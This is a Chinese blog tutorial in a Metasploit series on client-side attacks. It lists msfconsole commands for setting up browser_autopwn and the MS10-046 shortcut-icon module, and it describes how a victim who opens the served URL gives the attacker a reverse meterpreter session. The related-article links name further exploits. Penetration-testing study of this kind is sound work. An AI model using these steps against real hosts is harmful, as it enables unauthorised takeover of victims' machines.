Metasploit(六)客户端漏洞

最新推荐文章于 2023-12-28 17:12:56 发布
最新推荐文章于 2023-12-28 17:12:56 发布
阅读量349 收藏
点赞数
分类专栏: 安全测试 文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010680986/article/details/120030870
版权

浏览器漏洞攻击

1.启动msfconsole,输入use auxiliary/server/browser_autopwn

2.可以通过show options查看需要设置的信息

3.设置参数

set LHOST <攻击主机ip>

set SRVHOST <本地ip>

setSRVPORT 80

点击run

该模块有个恶意url,即图上最后的using url

被攻击对象的系统上打开该url后,会发送一个反向连接给攻击者的系统,可以看到上图反向链接被建立了,能看到进程被迁移

 可以通过任务管理器看到进程有被迁移

输入sessions可以查看meterpreter会话的,通过sessions -i <id>就可以选中

之后就可以查看被攻击主机的所有信息了

ie快捷方式图标漏洞攻击

使用exploit/windows/browser/ms10_046_shortcut_icon_dllloader,进入该模块

设置主机IP和端口

被攻击主机输入这个url

此时,可以就被完全控制,输入sessions,可以查看进程

选择sessions,就可以进入查看详细

如图,可以进行一些别的操作,如获取网络信息等等

6321
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现MetaCRM6 文件上传漏洞【CNVD-2020-48512】
记录并分享学习安全的知识点..
04-24 416
复现MetaCRM6 文件上传漏洞【CNVD-2020-48512】
metasploit--- 客户端漏洞利用
孤的博客
11-08 963
&amp;nbsp; &amp;nbsp; 客户端攻击:首先需要我们对客户端-服务器架构有一个清晰的概念,同时要区分客户端和服务端攻击的不同。服务器是在网络上共享其资源的主机,而客户端则是使用这些资源。客户端攻击仅限于客户端,且攻击目标是运行在这个特定的客户端主机上的有漏洞服务和程序。针对客户端可以发动很多攻击,比如,基于浏览器的攻击以及针对有漏洞服务的漏洞攻击。另外,客户端个操作系统上也会运行一些应用软件,如...
常见的客户端漏洞
github_38730134的博客
02-25 1183
常见的客户端漏洞 常规客户端安全 OAuth客户端有几种数据是需要保护的。客户端密钥、访问令牌、刷新令牌这些信息需要妥善保管,同时注意不要意外的将这些保密信息泄露到审计日志或其他记录中。除了存储系统上单纯的信息失窃外,OAuth客户端还可能出现其他类型的漏洞 针对客户端的CSRF攻击 授权码许可和隐式许可类型中推荐使用state参数,OAuth核心规范对该参数的描述如下: 客户端用来维护请求与回调之间状态的不透明值。授权服务器在将用户代理重定向回客户端时包含该值。应该使用这个参数,可以防止CSRF(跨域请
burpsuite靶场系列之客户端漏洞篇 - 跨站脚本(XSS)专题
weixin_50464560的博客
04-14 3256
https://www.anquanke.com/post/id/245953 本系列介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 客户端漏洞篇介绍 相对于服务器端漏洞篇,客户端漏洞篇会更加复杂
几个有意思的客户端漏洞
weixin_30685047的博客
03-30 1189
平时测试客户端时发现了几个比较有意思的客户端漏洞,记录一下。 非必要的数据传输 系统登录时,某个数据包会返回系统所有的用户名和加密的MD5密码: 解密以后使用账户密码即可登录任意用户: SQL注入 参数未经过滤直接带入数据库查询: 万能密码登录: 本地静态文件信息泄露 登录成功后,登录的用户名密码会保...
Metasploit's Guide
07-19
Metasploit是一个功能强大的渗透测试框架,它简化了发现、利用和分享漏洞的过程,让渗透测试工作更加迅速和简单。尽管Metasploit被全球的安全专业人员广泛使用,但对于初学者来说,它可能还是难以掌握。《Metasploit...
metasploit模拟攻击
03-17
**Metasploit**是一款开源的安全漏洞检测工具,它可以帮助安全专家验证漏洞的存在,并管理这些漏洞的利用方式。Metasploit广泛应用于渗透测试领域,用以评估系统的安全性。通过模拟攻击的方式,不仅可以发现系统的...
Metasploit-The Exploit Learning Tree
10-18
Metasploit是一个著名的渗透测试工具,它由Rapid7公司开发,主要用于发现安全漏洞并提供相应的攻击载荷。Metasploit框架支持多种类型的攻击,包括但不限于漏洞利用、后渗透测试和信息收集。Metasploit的功能十分强大...
Metasploit渗透测试指南.pdf
12-10
Metasploit渗透测试指南》共有17章,覆盖了渗透测试的情报搜集、威胁建模、漏洞分析、渗透攻击和后渗透攻击各个环节,并包含了免杀技术、客户端渗透攻击、社会工程学、自动化渗透测试、无线网络攻击等高级技术专题...
MSF(五):客户端渗透
1stPeak's Blog
02-21 878
客户端渗透 在无法突破网络边界的情况下转而攻击客户端 1、含有漏洞利用代码的WEB站点 利用客户端漏洞 2、社会工程学 直接骗取到敏感信息 含有漏洞利用代码的DOC、PDF等文档或Payload,诱骗被害者执行 3、诱骗被害者执行Payload (windows) 注:msfvenom集合了编码、payload msfvenom --list-options -p windows/she...
metasploit 魔鬼训练营 学习笔记(2) 第四章(web一些漏洞与防止)
ClintSeven的博客
04-12 340
metasploit 第四章开头以及之前学过的总结
Metasploit(七)后漏洞的信息收集
u010680986的博客
09-12 215
漏洞利用是系统被攻击后的操作,实际就是需要收集敏感信息,获取这些信息进行后续访问。 系统信息: sysinfo getpid 被攻击主机上可以看到 进程名与meterpreter查看的一致 检查是否是虚拟机 运行时间 run get_env 路由设置 ...
使用Nmap漏扫+Metasploit渗透测试框架,利用MS08-067漏洞渗透
george1898的博客
12-25 1143
本期框架介绍:Metasploit是一一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全评估,提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口中、选项、变量和模块所震撼,而感觉无所适从。下面我们将应用一个安全来熟透认知、一起来探讨它的微妙吧!
客户端应用漏洞挖掘之旅
最新发布
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
12-28 108
在2023年12月15日,我有幸参加了由“字节跳动安全中心”举办的“安全范儿”沙龙活动。作为“中孚信息元亨实验室”的一员,我被邀请分享名为“被忽视的暗面:客户端应用漏洞挖掘之旅”的技术议题。现整理成文字版分享出来,由于我不是专门从事二进制工作,因此文章中存在笔误或解释不对的地方,请各位师傅多多包涵!客户端应用漏洞是许多人在进行漏洞挖掘和安全测试时容易忽视的领域。
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4185
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
永恒之蓝漏洞复现(ms17-010)
热门推荐
国内一线红队,擅长攻防渗透,APT
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
渗透测试实例,xampp靶机实验
Mystic_JJ的博客
02-09 1345
实验名称:渗透测试实例,xampp靶机实验 实验目的:对xampp靶机进行渗透测试 实验环境:Kali虚拟机一台4G xampp靶机一台 IP:192.168.22.128 实验步骤: 一、对靶机进行扫描:使用Neuss 二、开启metasploit框架进行扫描 msf6 > db_nmap -A -T4 192.168.22.128 使用namp进行扫描 (1)进行渗透测试 扫描smb版本信息 msf6 > search smb_version 查看是否有smb版本扫
修改主机名时碰到E212:不能以写入模式打开
congzhan6321的博客
10-30 1693
修改主机名及E212:不能以写入模式打开问题的解决[@more@]1. 执行命令 hostname,修改当前系统的主机名 hostname newhost2. 修改 /etc/sysconfig/netwo...
metasploit客户端渗透概述
04-28
Metasploit是一款流行的开源渗透测试框架,可以用来测试网络系统的安全性Metasploit提供了多种攻击模块,包括针对客户端的渗透攻击模块。 对客户端的渗透攻击通常涉及到利用已知的漏洞或者社会工程学手段,来获取目标系统的访问权限。这些攻击可以通过Metasploit框架中的多种模块来实现,例如: 1. Exploit模块:可以利用已知的漏洞来攻击客户端系统,获取管理员权限或者远程执行代码。 2. Payload模块:可以在攻击成功后,在目标系统上执行各种操作,例如远程访问、文件上传、数据下载等。 3. Social Engineering模块:可以利用社会工程学手段来欺骗用户,例如通过钓鱼邮件或者伪装成合法的软件更新程序来诱骗用户执行恶意代码。 总之,Metasploit框架提供了强大的工具和模块,可以帮助安全测试人员和渗透测试人员快速、准确地评估客户端系统的安全性,并且可以帮助企业发现和修复潜在的安全漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值